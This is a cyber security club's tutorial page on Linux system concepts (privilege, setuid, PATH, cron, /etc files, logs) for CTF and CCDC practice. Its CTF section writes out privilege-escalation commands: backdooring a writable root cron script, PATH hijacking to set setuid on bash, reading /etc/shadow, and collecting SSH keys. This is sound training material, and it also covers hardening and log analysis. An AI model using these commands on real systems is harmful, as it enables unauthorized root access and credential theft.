<!DOCTYPE html>
<html id="R-html" lang="en-us" dir="ltr" itemscope itemtype="http://schema.org/Article" data-r-output-format="html">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="height=device-height, width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="generator" content="Hugo 0.164.0">
    <meta name="generator" content="Relearn 9.0.3+dd4f8457f5143e91eae3954813494d2b0cc6741c">
    <meta name="description" content="The system-level concepts — privilege, trust boundaries, process access — behind most vulnerabilities.">
    <meta name="author" content="">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="System Concepts :: FAU Cyber Security Club">
    <meta name="twitter:description" content="The system-level concepts — privilege, trust boundaries, process access — behind most vulnerabilities.">
    <meta property="og:url" content="https://example.org/learn/web-fundamentals/system-concepts/index.html">
    <meta property="og:site_name" content="FAU Cyber Security Club">
    <meta property="og:title" content="System Concepts :: FAU Cyber Security Club">
    <meta property="og:description" content="The system-level concepts — privilege, trust boundaries, process access — behind most vulnerabilities.">
    <meta property="og:locale" content="en_us">
    <meta property="og:type" content="article">
    <meta property="article:section" content="Learn">
    <meta itemprop="name" content="System Concepts :: FAU Cyber Security Club">
    <meta itemprop="description" content="The system-level concepts — privilege, trust boundaries, process access — behind most vulnerabilities.">
    <meta itemprop="wordCount" content="871">
    <title>System Concepts :: FAU Cyber Security Club</title>
    <link href="/images/logo.svg?1787991092" rel="icon" type="image/svg+xml">
    <link href="/css/auto-complete/auto-complete.min.css?1787991092" rel="stylesheet">
    <script src="/js/auto-complete/auto-complete.min.js?1787991092" defer></script>
    <script src="/js/search-lunr.min.js?1787991092" defer></script>
    <script src="/js/search.min.js?1787991092" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.index_js_url="/searchindex.en.js?1787991092";
    </script>
    <script src="/js/lunr/lunr.min.js?1787991092" defer></script>
    <script src="/js/lunr/lunr.stemmer.support.min.js?1787991092" defer></script>
    <script src="/js/lunr/lunr.multi.min.js?1787991092" defer></script>
    <script src="/js/lunr/lunr.en.min.js?1787991092" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.contentLangs=['en'];
    </script>
    <link href="/fonts/fontawesome/css/all.min.css?1787991092" rel="stylesheet" media="print" onload="this.media='all';this.onload=null;"><noscript><link href="/fonts/fontawesome/css/all.min.css?1787991092" rel="stylesheet"></noscript>
    <link href="/css/perfect-scrollbar/perfect-scrollbar.min.css?1787991092" rel="stylesheet">
    <link href="/css/theme.min.css?1787991092" rel="stylesheet">
    <link href="/css/format-html.min.css?1787991092" rel="stylesheet" id="R-format-style">
    <script>
      window.relearn = window.relearn || {};
      // configuration
      window.relearn.min = `.min`;
      window.relearn.path='\/learn\/web-fundamentals\/system-concepts\/index.html';
      window.relearn.relBasePath='..\/..\/..';
      window.relearn.relBaseUri='..\/..\/..';
      window.relearn.absBaseUri='https:\/\/example.org';
      window.relearn.disableInlineCopyToClipboard=false;
      window.relearn.enableBlockCodeWrap=true;
      // translations
      window.T_Copy_to_clipboard = `Copy text to clipboard`;
      window.T_Copied_to_clipboard = `Text copied to clipboard!`;
      window.T_Link_copied_to_clipboard = `Link copied to clipboard!`;
      window.T_Reset_view = `Reset view`;
      window.T_View_reset = `View reset!`;
      window.T_No_results_found = `No results found for "{0}"`;
      window.T_N_results_found = `{1} results found for "{0}"`;
      window.T_Browser_unsupported_feature = `This browser doesn't support this feature`;
      // variant stuff
      window.relearn.themevariants = [ 'hacker', 'hacker-light' ];
      window.relearn.customvariantprefix = "my-custom-";
      window.relearn.changeVariant = function(variant) {
        var oldVariant = document.documentElement.dataset.rThemeVariant;
        window.localStorage.setItem(window.relearn.absBaseUri + "/variant", variant);
        document.documentElement.dataset.rThemeVariant = variant;
        if (oldVariant != variant) {
          document.dispatchEvent( new CustomEvent('themeVariantLoaded', { detail: { variant, oldVariant } }) );
          window.relearn.markVariant();
        }
      }
      window.relearn.markVariant = function() {
        var variant = window.localStorage.getItem(window.relearn.absBaseUri + "/variant");
        document.querySelectorAll(".R-variantswitcher select").forEach((select) => {select.value = variant;});
      }
      window.relearn.initVariant = function() {
        var variant = window.localStorage.getItem(window.relearn.absBaseUri + "/variant") ?? "";
        if( !variant ||
            (!variant.startsWith(window.relearn.customvariantprefix) && !window.relearn.themevariants.includes(variant)) ||
            (variant.startsWith(window.relearn.customvariantprefix) && !window.localStorage.getItem(window.relearn.absBaseUri + "/variantstylesheet-" + variant)) ){
          variant = window.relearn.themevariants[0];
          window.localStorage.setItem(window.relearn.absBaseUri + "/variant", variant);
        }
        document.documentElement.dataset.rThemeVariant = variant;
      }
      window.relearn.initVariant();
      window.relearn.markVariant();
    </script>
    <link href="/css/custom.css?1787991092" rel="stylesheet">
    <script src="/js/custom.js?1787991092" defer></script>
  </head>
  <body class="mobile-support html" data-origin="/learn/web-fundamentals/system-concepts/index.html">
    <div id="R-body" class="default-animation">
      <div id="R-body-overlay"></div>
      <nav id="R-topbar" class="default-animation">
        <div class="topbar-wrapper default-animation">
          <div class="topbar-sidebar-divider default-animation"></div>
          <div class="topbar-area topbar-area-start" data-area="start">
            <div class="topbar-button topbar-button-sidebar default-animation" data-content-empty="disable" data-width-s="show" data-width-m="hide" data-width-l="hide">
<span class="btn cstyle button link noborder notitle interactive"><button onclick="toggleNav()" type="button" title="Menu (CTRL&#43;ALT&#43;n)"><i class="fa-fw fas fa-bars"></i></button></span>
            </div>
            <div class="topbar-button topbar-button-toc default-animation" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle button link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="Table of Contents (CTRL&#43;ALT&#43;t)"><i class="fa-fw fas fa-table-list"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
<nav class="TableOfContents">
  <ul>
    <li><a href="#users-and-groups">Users and Groups</a></li>
    <li><a href="#processes-and-privilege">Processes and Privilege</a></li>
    <li><a href="#environment-variables">Environment Variables</a></li>
    <li><a href="#etc-files-that-matter">/etc Files That Matter</a></li>
    <li><a href="#cron-jobs">Cron Jobs</a></li>
    <li><a href="#logs">Logs</a></li>
    <li><a href="#in-ctf-environments">In CTF Environments</a></li>
  </ul>
</nav>
                </div>
              </div>
            </div>
          </div>
          <ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype="http://schema.org/BreadcrumbList"><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/index.html"><span itemprop="name">FAU Cyber Security Club</span></a><meta itemprop="position" content="1">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/learn/index.html"><span itemprop="name">Learn</span></a><meta itemprop="position" content="2">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/learn/web-fundamentals/index.html"><span itemprop="name">Web &amp; System Fundamentals</span></a><meta itemprop="position" content="3">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><span itemprop="name">System Concepts</span><meta itemprop="position" content="4"></li>
          </ol>
          <div class="topbar-area topbar-area-end" data-area="end">
            <div class="topbar-button topbar-button-variant wf-variant-toggle default-animation" data-content-empty="show" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle button link noborder notitle"><span><i class="fa-fw fas fa-circle-half-stroke"></i></span></span>
            </div>

            <div class="topbar-button topbar-button-prev default-animation" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle button link noborder notitle interactive"><a href="/learn/web-fundamentals/http/index.html" title="HTTP (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-next default-animation" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle button link noborder notitle interactive"><a href="/learn/windows/index.html" title="Windows & Active Directory (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-more default-animation" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle button link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="More"><i class="fa-fw fas fa-ellipsis-v"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
                  <div class="topbar-area topbar-area-more" data-area="more">
                  </div>
                </div>
              </div>
            </div>

          </div>
        </div>
      </nav>
      <div id="R-main-overlay"></div>
      <main id="R-body-inner" class="highlightable learn" tabindex="-1">
        <div class="flex-block-wrapper">
<article class="default">
  <header class="headline">
  </header>

<h1 id="system-concepts">System Concepts</h1>

<p>Security vulnerabilities on the system level come down to a few recurring patterns: privilege misconfigurations, trusted environments running untrusted data, and processes with more access than they need.</p>
<p>This page covers the concepts that underpin most of those patterns.</p>
<hr>
<h2 id="users-and-groups">Users and Groups<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<p>Every process runs as a user. Every file is owned by a user and a group. Access is controlled by matching those identities.</p>
<ul>
<li><code>root</code> (UID 0) has no restrictions.</li>
<li>Regular users have restricted access by design.</li>
<li>Groups let multiple users share access to a resource.</li>
</ul>
<p>The principle of least privilege: a process should run with only the permissions it needs. When it has more, that is a vulnerability surface.</p>
<hr>
<h2 id="processes-and-privilege">Processes and Privilege<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<p>When you run a program, it inherits your user identity. That is the security boundary.</p>
<p>Things that break this model (intentionally and otherwise):</p>
<table>
	<thead>
			<tr>
					<th>Mechanism</th>
					<th>What it does</th>
			</tr>
	</thead>
	<tbody>
			<tr>
					<td><code>setuid</code> bit</td>
					<td>Binary runs as its owner, not the caller</td>
			</tr>
			<tr>
					<td><code>sudo</code></td>
					<td>Elevate to root (or another user) for one command</td>
			</tr>
			<tr>
					<td><code>su</code></td>
					<td>Switch to another user for a session</td>
			</tr>
			<tr>
					<td>Capabilities</td>
					<td>Grant specific root powers without full root</td>
			</tr>
	</tbody>
</table>
<p>A <code>setuid</code> binary owned by root that is exploitable gives you root. That is the classic privilege escalation scenario.</p>
<hr>
<h2 id="environment-variables">Environment Variables<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<p>Environment variables are key-value pairs available to all processes. They carry configuration without hardcoding it in source.</p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">printenv                    <span class="c1"># show all environment variables</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="nv">$PATH</span>                  <span class="c1"># where the shell looks for executables</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="nv">$HOME</span>                  <span class="c1"># your home directory</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">MYVAR</span><span class="o">=</span><span class="s2">&#34;value&#34;</span>        <span class="c1"># set for current session and subprocesses</span></span></span></code></pre></div>
<p><strong>Security relevance:</strong> An attacker with control over environment variables can often influence program behavior. <code>PATH</code> manipulation is a classic attack vector — if a script calls <code>python</code> without an absolute path and <code>PATH</code> is attacker-controlled, the attacker can substitute a malicious binary.</p>
<hr>
<h2 id="etc-files-that-matter">/etc Files That Matter<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<table>
	<thead>
			<tr>
					<th>File</th>
					<th>What it is</th>
			</tr>
	</thead>
	<tbody>
			<tr>
					<td><code>/etc/passwd</code></td>
					<td>User account info (no passwords)</td>
			</tr>
			<tr>
					<td><code>/etc/shadow</code></td>
					<td>Password hashes (root-readable only)</td>
			</tr>
			<tr>
					<td><code>/etc/group</code></td>
					<td>Group memberships</td>
			</tr>
			<tr>
					<td><code>/etc/sudoers</code></td>
					<td>Who can run what with sudo</td>
			</tr>
			<tr>
					<td><code>/etc/hosts</code></td>
					<td>Local hostname-to-IP mappings</td>
			</tr>
			<tr>
					<td><code>/etc/crontab</code></td>
					<td>Scheduled tasks running as root</td>
			</tr>
			<tr>
					<td><code>/etc/ssh/sshd_config</code></td>
					<td>SSH server configuration</td>
			</tr>
	</tbody>
</table>
<p>On a compromised system, these are among the first files you read. On a hardened system, these are among the first things audited.</p>
<hr>
<h2 id="cron-jobs">Cron Jobs<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<p>Cron is the task scheduler. Jobs run on a schedule, often as root.</p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">crontab -l              <span class="c1"># list current user&#39;s cron jobs</span>
</span></span><span class="line"><span class="cl">cat /etc/crontab        <span class="c1"># system-wide cron jobs</span>
</span></span><span class="line"><span class="cl">ls /etc/cron.d/         <span class="c1"># additional cron configs</span></span></span></code></pre></div>
<p>A world-writable script being executed by a root cron job is an instant privilege escalation path.</p>
<hr>
<h2 id="logs">Logs<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">/var/log/auth.log       <span class="c1"># authentication events (ssh logins, sudo usage)</span>
</span></span><span class="line"><span class="cl">/var/log/syslog         <span class="c1"># general system messages</span>
</span></span><span class="line"><span class="cl">/var/log/apache2/       <span class="c1"># web server logs</span>
</span></span><span class="line"><span class="cl">/var/log/nginx/         <span class="c1"># nginx logs</span>
</span></span><span class="line"><span class="cl">journalctl -xe          <span class="c1"># systemd journal</span></span></span></code></pre></div>
<p>Logs are evidence. Attackers try to clear them. Defenders aggregate and monitor them with SIEM tools.</p>
<hr>
<h2 id="in-ctf-environments">In CTF Environments<span class="btn cstyle anchor copyanchor scrollanchor link noborder notitle interactive"><button type="button" title="Copy link to clipboard"><i class="fa-fw fas fa-link fa-lg"></i></button></span></h2>
<p>System-level concepts are the foundation of privilege escalation and blue team hardening. They show up in every CTF Linux box and in CCDC on day one.</p>
<p><strong>Exploiting cron — most overlooked privesc vector:</strong></p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Find cron jobs running as root</span>
</span></span><span class="line"><span class="cl">cat /etc/crontab
</span></span><span class="line"><span class="cl">ls -la /etc/cron*
</span></span><span class="line"><span class="cl">cat /var/spool/cron/crontabs/root 2&gt;/dev/null
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Find scripts called by root cron that are world-writable</span>
</span></span><span class="line"><span class="cl">find /etc/cron* /var/spool/cron -type f 2&gt;/dev/null <span class="p">|</span> xargs ls -la 2&gt;/dev/null
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># If a cron job runs /opt/backup.sh and you can write to it:</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;chmod +s /bin/bash&#34;</span> &gt;&gt; /opt/backup.sh
</span></span><span class="line"><span class="cl"><span class="c1"># Wait for cron to run, then: bash -p → root shell</span></span></span></code></pre></div>
<p><strong>PATH hijacking — exploiting relative command calls:</strong></p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># If a setuid script calls `python` or `curl` without an absolute path:</span>
</span></span><span class="line"><span class="cl">mkdir /tmp/hijack
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s1">&#39;#!/bin/bash&#39;</span> &gt; /tmp/hijack/python
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s1">&#39;chmod +s /bin/bash&#39;</span> &gt;&gt; /tmp/hijack/python
</span></span><span class="line"><span class="cl">chmod +x /tmp/hijack/python
</span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span>/tmp/hijack:<span class="nv">$PATH</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Run the vulnerable setuid binary — it calls your fake `python` instead</span></span></span></code></pre></div>
<p><strong>Reading sensitive /etc files after getting a shell:</strong></p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Check sudoers — who can run what without a password</span>
</span></span><span class="line"><span class="cl">cat /etc/sudoers
</span></span><span class="line"><span class="cl">cat /etc/sudoers.d/*
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Pull password hashes if you have root (crack offline with hashcat/john)</span>
</span></span><span class="line"><span class="cl">cat /etc/shadow
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Find SSH keys</span>
</span></span><span class="line"><span class="cl">find / -name <span class="s2">&#34;id_rsa&#34;</span> -o -name <span class="s2">&#34;id_ed25519&#34;</span> 2&gt;/dev/null
</span></span><span class="line"><span class="cl">cat ~/.ssh/authorized_keys   <span class="c1"># can you add your own key?</span></span></span></code></pre></div>
<p><strong>CCDC — hardening system concepts on day one:</strong></p>
<p>These are the first things an experienced CCDC team locks down when the competition starts:</p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 1. Check and restrict sudoers immediately</span>
</span></span><span class="line"><span class="cl">visudo   <span class="c1"># remove NOPASSWD entries and wildcard rules</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 2. Disable unnecessary services</span>
</span></span><span class="line"><span class="cl">systemctl list-units --type<span class="o">=</span>service --state<span class="o">=</span>running
</span></span><span class="line"><span class="cl">systemctl stop &lt;service&gt;<span class="p">;</span> systemctl disable &lt;service&gt;
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 3. Check for cron jobs left by the scenario injects (red team backdoors often use cron)</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> user in <span class="k">$(</span>cut -f1 -d: /etc/passwd<span class="k">)</span><span class="p">;</span> <span class="k">do</span>
</span></span><span class="line"><span class="cl">    crontab -u <span class="nv">$user</span> -l 2&gt;/dev/null <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">&#34;--- </span><span class="nv">$user</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="k">done</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 4. Watch auth logs live for red team activity</span>
</span></span><span class="line"><span class="cl">tail -f /var/log/auth.log <span class="p">|</span> grep -E <span class="s2">&#34;(Failed|Accepted|sudo)&#34;</span></span></span></code></pre></div>
<p><strong>Log analysis for forensics CTF challenges:</strong></p>
<div class="highlight actionbar-wrapper wrap-code" dir="auto"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Count failed login attempts by IP (brute force detection)</span>
</span></span><span class="line"><span class="cl">grep <span class="s2">&#34;Failed password&#34;</span> /var/log/auth.log <span class="p">|</span> awk <span class="s1">&#39;{print $11}&#39;</span> <span class="p">|</span> sort <span class="p">|</span> uniq -c <span class="p">|</span> sort -rn
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Find what commands were run via sudo</span>
</span></span><span class="line"><span class="cl">grep <span class="s2">&#34;sudo&#34;</span> /var/log/auth.log
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Find successful logins</span>
</span></span><span class="line"><span class="cl">grep <span class="s2">&#34;Accepted&#34;</span> /var/log/auth.log</span></span></code></pre></div>
<hr>

<details open class="box cstyle notices info">
  <summary class="box-label" tabindex="-1">
    <i class="fa-fw fas fa-info-circle"></i> 
    How the Club Uses This
  </summary>
  <div class="box-content">
<p>Cron, PATH, and sudo misconfigurations are the three most common privilege escalation paths in CTF Linux boxes. In CCDC, hardening these same vectors before the red team can use them is a core day-one task.</p>
  </div>
</details>
<hr>
<p><strong>References</strong></p>
<ul>
<li><a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation" rel="external">Linux Privilege Escalation techniques — HackTricks</a></li>
<li><a href="https://github.com/peass-ng/PEASS-ng" rel="external">PEAS-ng — automated privilege escalation enumeration</a></li>
<li><a href="https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/" rel="external">Understanding /etc/passwd and /etc/shadow</a></li>
</ul>

  <footer class="footline">
  </footer>
</article>
        </div>
      </main>
    </div>
    <aside id="R-sidebar" class="default-animation">
      <div id="R-header-topbar" class="default-animation"></div>
      <div id="R-header-wrapper" class="default-animation">
<a id="R-logo" class="R-default direction-row" href="/index.html">
  <span class="logo-image default-animation">
    <img class="wf-logo__dark"  src="/images/logo.svg" alt="" aria-hidden="true">
    <img class="wf-logo__light" src="/images/shield-light.svg" alt="" aria-hidden="true">
  </span>
  <span class="logo-title default-animation">FAU Cyber Security Club</span>
</a>

        <search><form action="/search/index.html" method="get">
          <div class="searchbox default-animation">
            <button class="search-detail" type="submit" title="Search (CTRL+ALT+f)"><i class="fas fa-fw fa-search"></i></button>
            <label class="a11y-only" for="R-search-by">Search</label>
            <input data-search-input id="R-search-by" name="search-by" class="search-by" type="search" placeholder="Search...">
            <button class="search-clear" type="button" data-search-clear="" title="Clear search"><i class="fas fa-fw fa-times" title="Clear search"></i></button>
          </div>
        </form></search>
      </div>
      <div id="R-homelinks" class="default-animation homelinks">
        <div class="R-menu-divider default-animation">
          <hr class="padding default-animation">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-homelinks default-animation">
          <ul class="space collapsible-menu">
            <li class="" data-nav-id="/index.html"><a class="padding" href="/index.html"><i class="fa-fw fas fa-home"></i> Home</a></li>
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding default-animation">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-headercontrols default-animation">
          <ul class="">
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding default-animation">
        </div>
      </div>
      <div id="R-content-wrapper" class="highlightable">
        <div class="R-sidebarmenu R-shortcutmenu-home default-animation">
          <ul class="enlarge morespace collapsible-menu">
            <li class="" data-nav-id="/start/index.html"><a class="padding" href="/start/index.html">New?</a></li>
            <li class="parent " data-nav-id="/learn/index.html"><a class="padding default-animation" href="/learn/index.html">Learn</a><ul id="R-subsections-3043ad09e1e54c6b49d9aa6fbb58ab0f" class="collapsible-menu">
            <li class="alwaysopen " data-nav-id="/learn/virtual-machines/index.html"><a class="padding default-animation" href="/learn/virtual-machines/index.html">Virtual Machines</a><ul id="R-subsections-59f5ccd870c4fc03abd9b69640874a1f" class="collapsible-menu"></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/linux/index.html"><a class="padding default-animation" href="/learn/linux/index.html">Linux</a><ul id="R-subsections-13cee4e8a99446dc8ebb7de89edd082b" class="collapsible-menu"></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/networking/index.html"><a class="padding default-animation" href="/learn/networking/index.html">Networking</a><ul id="R-subsections-cf6bef6447ee5c4a2443556071838940" class="collapsible-menu"></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/cli-scripting/index.html"><a class="padding default-animation" href="/learn/cli-scripting/index.html">CLI &amp; Scripting</a><ul id="R-subsections-25bc0dbb515bc17b3dae2198fc35e410" class="collapsible-menu"></ul></li>
            <li class="parent alwaysopen " data-nav-id="/learn/web-fundamentals/index.html"><a class="padding default-animation" href="/learn/web-fundamentals/index.html">Web &amp; System Fundamentals</a><ul id="R-subsections-059cbefc7865f445f16aa5723b8e5634" class="collapsible-menu">
            <li class="" data-nav-id="/learn/web-fundamentals/http/index.html"><a class="padding" href="/learn/web-fundamentals/http/index.html">HTTP</a></li>
            <li class="active " data-nav-id="/learn/web-fundamentals/system-concepts/index.html"><a class="padding" href="/learn/web-fundamentals/system-concepts/index.html">System Concepts</a></li></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/windows/index.html"><a class="padding default-animation" href="/learn/windows/index.html">Windows &amp; Active Directory</a><ul id="R-subsections-a730549f2efa4d1e274d14685feab8eb" class="collapsible-menu"></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/cryptography/index.html"><a class="padding default-animation" href="/learn/cryptography/index.html">Cryptography</a><ul id="R-subsections-39d0a9d11822e4379c1887dd88fcd860" class="collapsible-menu"></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/ai/index.html"><a class="padding default-animation" href="/learn/ai/index.html">AI</a><ul id="R-subsections-501934f4c83e2c1d7165e75c44f96956" class="collapsible-menu"></ul></li>
            <li class="alwaysopen " data-nav-id="/learn/specializations/index.html"><a class="padding default-animation" href="/learn/specializations/index.html">Specializations</a><ul id="R-subsections-76b8bdc5bdb02d450cc67abb8c740f83" class="collapsible-menu"></ul></li></ul></li>
            <li class="" data-nav-id="/compete/index.html"><a class="padding default-animation" href="/compete/index.html">Compete</a><ul id="R-subsections-0e95d5e51c13d68d27ee0bb3e33f50b7" class="collapsible-menu"></ul></li>
            <li class="" data-nav-id="/lab/index.html"><a class="padding default-animation" href="/lab/index.html">Club Lab</a><ul id="R-subsections-3267a40151b19e3e3f8d4c8a3edf34ee" class="collapsible-menu"></ul></li>
            <li class="" data-nav-id="/projects/index.html"><a class="padding" href="/projects/index.html">Projects &amp; Guides</a></li>
            <li class="" data-nav-id="/toolbox/index.html"><a class="padding default-animation" href="/toolbox/index.html">Toolbox</a><ul id="R-subsections-f7060c654e07bee22171d50d3d26bb46" class="collapsible-menu"></ul></li>
            <li class="" data-nav-id="/meta/index.html"><a class="padding default-animation" href="/meta/index.html">Meta</a><ul id="R-subsections-2f839601009aa63e83121a533a314010" class="collapsible-menu"></ul></li>
          </ul>
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-shortcuts default-animation">
          <div class="nav-title padding">Quick Links</div>
          <ul class="space collapsible-menu">
            <li class="" data-nav-id="http://discord.gg/2Yun8WAUuy"><a class="padding" href="http://discord.gg/2Yun8WAUuy" rel="external"><i class='fab fa-fw fa-discord'></i> Discord</a></li>
            <li class="" data-nav-id="https://github.com/dxcently/fau-cyber-security-club-wiki"><a class="padding" href="https://github.com/dxcently/fau-cyber-security-club-wiki" rel="external"><i class='fab fa-fw fa-github'></i> GitHub</a></li>
            <li class="" data-nav-id="https://fau.campuslabs.com/engage/organization/cybersecurity"><a class="padding" href="https://fau.campuslabs.com/engage/organization/cybersecurity" rel="external"><i class='fa-solid fa-school-flag'></i> Owl Central</a></li>
            <li class="" data-nav-id="mailto:csc@fau.edu"><a class="padding" href="mailto:csc@fau.edu" rel="external"><i class='fa-solid fa-envelope'></i> csc@fau.edu</a></li>
          </ul>
        </div>
        <div id="R-footer-margin" class="default-animation"></div>
        <div class="R-menu-divider default-animation">
          <hr class="padding default-animation">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-footercontrols default-animation">
          <ul class="">
            <li class="R-variantswitcher">
              <div class="padding menu-control">
                <i class="fa-fw fas fa-paint-brush"></i>
                <span>&nbsp;</span>
                <div class="control-style">
                  <label class="a11y-only" for="R-select-variant">Theme</label>
                  <select id="R-select-variant">
                    <option id="R-select-variant-hacker" value="hacker" selected>Dark</option>
                    <option id="R-select-variant-hacker-light" value="hacker-light">Light</option>
                  </select>
                </div>
                <div class="clear"></div>
              </div>
              <script>window.relearn.markVariant();</script>
            </li>
          </ul>
        </div>
<div id="R-footer" class="default-animation"><p>Built with <a href="https://github.com/McShelby/hugo-theme-relearn" title="love"><i class="fas fa-heart"></i></a> by <a href="https://gohugo.io/">Hugo</a></p></div>
      </div>
    </aside>
    <script src="/js/perfect-scrollbar/perfect-scrollbar.min.js?1787991092" defer></script>
    <script src="/js/theme.min.js?1787991092" defer></script>

    <div id="toast-container" role="status" aria-live="polite" aria-atomic="false"></div>
  </body>
</html>
